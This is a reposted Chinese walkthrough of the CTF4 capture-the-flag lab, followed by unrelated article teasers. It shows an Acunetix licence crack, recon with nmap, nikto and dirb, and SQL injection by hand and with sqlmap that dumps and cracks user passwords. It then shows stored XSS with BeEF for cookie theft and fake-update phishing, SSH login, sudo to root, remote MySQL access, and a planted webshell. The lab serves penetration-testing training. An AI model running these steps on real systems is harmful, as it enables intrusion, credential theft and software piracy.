零基础打靶—CTF4靶场

一、打靶的主要五大步骤

1.确定目标:在所有的靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。
2.常见的信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这次训练靶场中比如信息收集包括查看源码,使用工具dirb等
3.发现漏洞:之前你们看到那些理论比如sql注入,文件上传等,或者找到相关的系统信息,去网上找相关的exp这些都是为了拿到webshell
4.利用漏洞就是使用漏洞拿到webshell
5.权限提升,就是所谓的提权,因为一般进入拿到webshell后进入到服务器了都是低权限,在接下来的靶中我们的目标都是拿到root权限,所以拿到webshell后是低权限用户,这个时候我们需要一系列的方式进行提权,最后拿到root权限,即为结束。


                                    文章所需靶场及打靶过程所遇问题关注后私信获得


二、打靶的具体流程

打开本次打靶所需要的靶机(ctf4)及攻击机(kali)

渗透测试工具安装Awvs(将AWVS压缩包拖进kali开始执行命令)

sudo ./acunetix_14.5.211115146_x64.sh

按回车同意隐私条款…..
注意 一直长按就行了,直到末尾输入yes

然后输入用户名和密码以及邮箱。邮箱:3157443409@qq.com 密码:!20021118Ws

接下来浏览器输入https://192.168.99.128:3443/ 用刚才设置的账号和密码登录(需使用自己的kali的IP)邮箱:3157443409@qq.com   密码:!20021118Ws(不是确定的依据个人爱好设定)

登录后,提示目前是尚未激活的状态。  

接下来进行破解

复制 license_info.json  wa_data.dat 这两个文件到/home/acunetix/.acunetix/data/license/目录,全部替换即可

查看存在license_info.json  wa_data.dat 这2个文件,下面进行覆盖

修改hosts文件
vim /etc/hosts
#增加下面两行
127.0.0.1 updates.acunetix.com
127.0.0.1 erp.acunetix.com

然后再次刷新浏览器,可以看到已经激活

设置不更新

AWVS进程:

关闭acunetix服务
sudo service acunetix stop
开启acunetix服务
sudo service acunetix start
重启acunetix服务
sudo service acunetix restart
查看acunetix服务
sudo service acunetix status

信息收集查询靶机的IP 与开放端口以及一些渗透测试

查看自己的网卡设备名和IP地址段

使用工具对该网段进行局域网存活主机探测

fping -g 192.168.99.0/24
sudo netdiscover -i eth0 -r 192.168.99.0/24
sudo arp-scan -l

使用nmap对发现的主机进行扫描

┌──(kali㉿kali)-[~]
└─$ sudo nmap -A -v -sS -sV -p- 192.168.8.133 

通过Wappalyzer插件获得信息:

Web服务:Apache 2.2.0
操作系统:Fedora
后端语言:PHP 5.1.2

使用Nikto漏洞扫描

┌──(kali㉿kali)-[~]
└─$ nikto -host http://192.168.99.129

提取重要信息:
+服务器:Apache/2.2.0(Fedora)
+检索到x-powered-by-header:PHP/5.1.2
+防点击劫持X-Frame-Options标头不存在。

报告输出在本地

┌──(kali㉿kali)-[~]
└─$ nikto -host http://192.168.99.129 -o test.html -F html  #输出报告,

重要目录文件分析robots.txt文件

 /sql/目录

/admin/目录

/usage/目录


/pages/目录 可以看到目录索引


mail目录 mail登录后台

 手动分析注入 

浏览网站博客Blog,点击某一个博客,发现页面,修改id值,页面出现跳转

hackbar手动安装

尝试构造注入点输入单引号发现页面报错,可能存在SQL注入漏洞,需要进一步分析判断

尝试构建SQL注入语句,查看错误信息,order by判断字段发现6 页面报错,5页面没有报错,说明当前表有5列即5个字段

尝试构建SQL注入语句,查看错误信息,union查询判断注入点,发现2、3、5、4存在注入点;

查询当前数据库;查询到当前数据库为ehks

查询当前数据库里所有表:可以看到:blog,comment,user 3个表group_concat函数详解

查询当前表所有字段名; (补充:查询user表是因为用户名和密码信息一般放在该表里)

查询当前表里User和Password字段值;
用户的密码
02e823a15a392b5aa4ff4ccb9060fa68,ilike2surf
b46265f1e7faa3beab09db5c28739380,seventysixers
8f4743c04ed8e5f39166a81f26319bb5,Homesite
7c7bc9f465d86b8164686ebb5151a717,Sue1978
64d1f88b9b276aece4b0edcc25b7a434,pacman
9f3eb3087298ff21843cc4e013cf355f undone1
查询到密码发现密码被加密了,使用MD5解密得到密码;
最终结果:
dstevens,ilike2surf
achen,seventysixers
pmoore,Homesite
jdurbin,Sue1978
sorzek,pacman
ghighland,undone1

列出所有数据库的名字;可以看到结果6个数据库

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.99.129/index.html?page=blog&title=Blog&id=2" --dbs

列出当前数据库的名字;

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.99.129/index.html?page=blog&title=Blog&id=2" --current-db

列出当前数据库的所有表名

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.99.129/index.html?page=blog&title=Blog&id=2" -D 'ehks' --tables 

列出user表中的所有字段名

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.99.129/index.html?page=blog&title=Blog&id=2" -D 'ehks' -T 'user' --columns

列出user_name,user_pass字段中的所有字段内容

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.99.129/index.html?page=blog&title=Blog&id=2" -D 'ehks' -T 'user' -C 'user_name,user_pass' --dump //这里主要--dump

尝试去爆破MySQL数据库,拿到user表的重要信息

┌──(kali㉿kali)-[~]└─$ sqlmap -u "http://192.168.99.129/index.html?page=blog&title=Blog&id=2" -D 'mysql' -T 'user' -C 'user,password' --dump 

登录后台页面

使用刚SQL注入成功获取到的Ehks数据库的账户和密码登录

尝试构造 :(POC)来验证与检查漏洞的存在

点击blog,出现弹窗,刷新依然存在,判断为存储性XSS

登录到数据库可以看到,已经存入到数据库blog表中

kali安装beef:(通过XSS漏洞配合JS脚本和Metasploit进行渗透)

┌──(kali㉿kali)-[~]
└─$ sudo apt-get update #更新 
┌──(kali㉿kali)-[~]
└─$ sudo apt-get install beef-xss #安装beef-xss  
┌──(kali㉿kali)-[~]
└─$ ls /usr/share/beef-xss #beef=xss 安装路径

启动beef
过程中要求,修改密码,这里修改为123456 默认为beef

打开web页面进行登录 登录:用户名beef 密码:123456

查看脚本

将脚本放在靶机中:

post 提交后,点击Blog,触发XSS,可以在BeEF页面,可以看到肉鸡上线,这里是本地宿主机这里使用的是本地火狐浏览器访问的,所以肉鸡为本地宿主机

在BeEF页面,点击链接的肉鸡

获取cookie:

跳转链接:

伪造flash更新钓鱼:

可以看到屏幕已经劫持,必须点击中间图片,进行页面跳转,这里可以构造钓鱼网站进行信息收录

DirBuster暴力扫描 选择字典类型,字典列表, / usr / share / dirbuster / wordlists

可以看到目录索引

权限提升 SSH利用 

尝试使用获取的账号尝试去登陆ssh,成功登陆,接下来进一步提权

cd /etc/ssh
ls 
cat ssh_config
sudo vim ssh_configKexAlgorithms +diffie-hellman-group1-sha1
HostkeyAlgorithms +ssh-rsa
PubkeyAcceptedKeyTypes +ssh-rsa

再次尝试 可以使用ssh登录 密码:seventysixers

sudo ssh achen@192.168.99.129

使用sudo提权

[achen@ctf4 ~]$ sudo su 
[root@ctf4 achen]# whoami
[root@ctf4 achen]# id

su命令就是用于账号切换的系统命令,

提权后操作查看IP地址
[root@ctf4 achen]# /sbin/ifconfig 

远程登录数据库

mysql> use mysql; --使用MySQL数据库
mysql> select host,user,password from user;

实现远程连接

再次查看

mysql> select host,user,password from user;

尝试使用数据库工具远程链接 测试链接

链接数据库:用户root 密码:root

编写Webshell或上传Webshell

[root@ctf4 ~]# cd ~[root@ctf4 ~]# pwd /root[root@ctf4 ~]# cd /var/www/[root@ctf4 www]# lscgi-bin  error  html  icons  usage[root@ctf4 www]# cd html[root@ctf4 html]# lsadmin     conf    inc         index.html.bak  pages       robots.txtcalendar  images  index.html  mail            restricted  sql[root@ctf4 html]# vim shell.php

可以使用Webshell管理工具链接shell.php,这里使用蚁剑

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/191755.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Python标准库:math库【侯小啾python领航班系列(十六)】

Python标准库:math库【侯小啾python领航班系列(十六)】 大家好,我是博主侯小啾, 🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ🌹꧔ꦿ…

【每日一题】找出叠涂元素

文章目录 Tag题目来源题目解读解题思路方法一:哈希表 写在最后 Tag 【哈希表】【数组】【2023-12-01】 题目来源 2661. 找出叠涂元素 题目解读 从左往右遍历 arr 给矩阵 mat 上色,在上色的过程中矩阵的某一行或者某一列的全部被上色了,返回…

(C语言)找出1-99之间的全部同构数

同构数&#xff1a;它出现在平方数的右边。例&#xff1a;5是25右边的数&#xff0c;25是625右边的数&#xff0c;即5和25均是同构数。 #include<stdio.h> int main() {for(int i 1;i < 100;i ){if((i*i % 10 i) || (i*i % 100 i))printf("%d\t%d\n",i,…

第6章 异步爬虫

目录 1. 协程的基本原理1.1 案例引入1.2 基础知识阻塞非阻塞同步异步多进程协程 1.3 协程的用法1.4 定义协程1.5 绑定回调1.6 多任务协程1.7 协程实现1.8 使用aiohttp安装使用 2. aiohttp的使用2.1 基本介绍2.2 基本实例2.3 URL参数设置2.4 其他请求类型2.5 POST请求表单提交JS…

Java数据结构之《哈希查找》题目

一、前言&#xff1a; 这是怀化学院的&#xff1a;Java数据结构中的一道难度中等的一道编程题(此方法为博主自己研究&#xff0c;问题基本解决&#xff0c;若有bug欢迎下方评论提出意见&#xff0c;我会第一时间改进代码&#xff0c;谢谢&#xff01;) 后面其他编程题只要我写完…

ChatGPT成为“帮凶”:生成虚假数据集支持未知科学假设

ChatGPT 自发布以来&#xff0c;就成为了大家的好帮手&#xff0c;学生党和打工人更是每天都离不开。 然而这次好帮手 ChatGPT 却帮过头了&#xff0c;莫名奇妙的成为了“帮凶”&#xff0c;一位研究人员利用 ChatGPT 创建了虚假的数据集&#xff0c;用来支持未知的科学假设。…

HarmonyOS应用开发——程序框架UIAbility、启动模式与路由跳转

前言 UIAbility简单来说就是一种包含用户界面的应用组件&#xff0c;用于和用户进行交互。每一个UIAbility实例&#xff0c;对应于一个最近任务列表中的任务。 一个应用可以有一个UIAbility&#xff0c;也可以有多个UIAbility。一个UIAbility可以对应于多个页面&#xff0c;建议…

半监督语义分割综述

paper link&#xff1a;https://arxiv.org/pdf/2302.09899.pdf 1. Introduction 图像分割是最古老、研究最广泛的计算机视觉 (CV) 问题之一。图像分割是指将图像划分为不同的非重叠区域&#xff0c;并将相应的标签分配给图像中的每个像素&#xff0c;最终获得ROI区域位置及其类…

线上CPU飙高问题排查!

https://v.douyin.com/iRTqH5ug/ linux top命令 top 命令是 Linux 下一个强大的实用程序&#xff0c;提供了系统资源使用情况的动态、实时概览。它显示了当前正在运行的进程信息&#xff0c;以及有关系统性能和资源利用情况的信息。 以下是 top 命令提供的关键信息的简要概述…

Linux 内核源码各版本下载

下载地址&#xff1a; kernel/git/stable/linux.git - Linux kernel stable treehttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/refs/ 1. Linux 内核的基本概念&#xff1a; 内核是什么&#xff1f; 内核是操作系统的核心部分&#xff0c;负责管理系统…

springboot工作原理

Spring Boot 是一个用于创建独立的、基于Spring框架的Java应用程序的开发框架。它简化了Spring应用程序的配置和部署过程&#xff0c;提供了一种快速、方便的方式来构建可扩展的、可部署的应用程序。 Spring Boot 的工作原理可以概括如下&#xff1a; 1. 自动配置&#xff08…

割裂式“多渠道”不是真正的全渠道!浅析全渠道零售和DTC在理念上的不谋而合|徐礼昭

图文&#xff1a;徐礼昭 全渠道零售概念解析 全渠道零售概念由来已久&#xff0c;单纯从业务经营角度&#xff0c;一个品牌在线上线下多个渠道铺货卖货&#xff0c;只能说是多渠道零售&#xff0c;而不是全渠道零售。商派市场负责人徐礼昭认为&#xff0c;品牌企业应该从消费者…

Java JDBC SQLite 示例

SQLite是一个简单、小巧、快速、可靠、无服务器、零配置和无需安装的 SQL 数据库库&#xff0c;它与客户端应用程序在进程中运行。尽管www.sqlite.org没有官方的 JDBC 驱动程序库&#xff0c;但www.xerial.org提供了一个——一个 XML 数据库管理系统项目。 1.下载SQLite JDBC驱…

wpf devexpress 使用IDataErrorInfo实现input验证

此处下载源码 当form初始化显示&#xff0c;Register按钮应该启动和没有输入错误应该显示。如果用户点击注册按钮在特定的输入无效数据&#xff0c;form将显示输入错误和禁用的注册按钮。实现逻辑在标准的IDataErrorInfo接口。请查阅IDataErrorInfo接口&#xff08;System.Com…

Fabric:创建应用通道

搭建自定义网络可以参考文章&#xff1a; https://blog.csdn.net/yeshang_lady/article/details/134113296 1 创建通道 网络搭建完成之后&#xff0c;就可以开始创建通道了。Fabric V2.5.4中可以在不创建系统通道的情况下直接创建应用通道。 1.1 修改配置文件 先创建配置文…

【AIGC】接着昨天的AI“洗图”骚操作,继续调戏国产大模型

目录 一、洗稿&#xff0c;洗图&#xff0c;洗视频 二、如何洗图 2.1 先看看效果 2.2 如何做的 2.3 提示词示例 三、试试星火和通义 2.1 星火和通义的特点 2.2 星火的做图能力理解力强&#xff0c;准确度还有待提高 2.3 通义大模型伺候 2.4 这3个大模型可以配合使用 …

【1day】华天软件 OA ntkodownload接口任意文件读取学习

注:该文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与作者无关。 目录 一、漏洞描述 二、影响版本 三、资产测绘 四、漏洞复现

结构体||联合体

1.结构体 1.1实际生活中一些东西往往有多个元素组成。如一名学生有身高、体重、名字、学号等。这时候就需要用到结构体。 结构体是一些值的结合&#xff0c;这些值被称为成员变量。结构体的每个成员可以是不同类型的变量&#xff0c;如&#xff1a;标量、数组、指针、甚至是其…

基于模型生成代码(MBD)

基于模型生成代码(MBD) 1、MBD的基本概念 图形化模型:MBD主要使用图形化的方式来表示系统。这些模型可以是控制流程图、状态机、或者其他形式的图形表示,能够清晰地展示系统的行为和逻辑。从概念到实现:在MBD中,整个开发流程从概念设计开始,直至实现和测试,都围绕模型…

基于2D激光雷达匹配的充电桩位姿检测

原理 1. 激光雷达滤波&#xff0c;滤除太远的雷达数据&#xff0c;并降采样 2. 对雷达数据进行分割聚类出candidates 3. 通过策略&#xff0c;过滤掉大部分不符合的candidates 4. 对candidates与充电桩模板数据进行PCA、ICP匹配 5. 选择距离最小或者得分最高的一帧作为输出…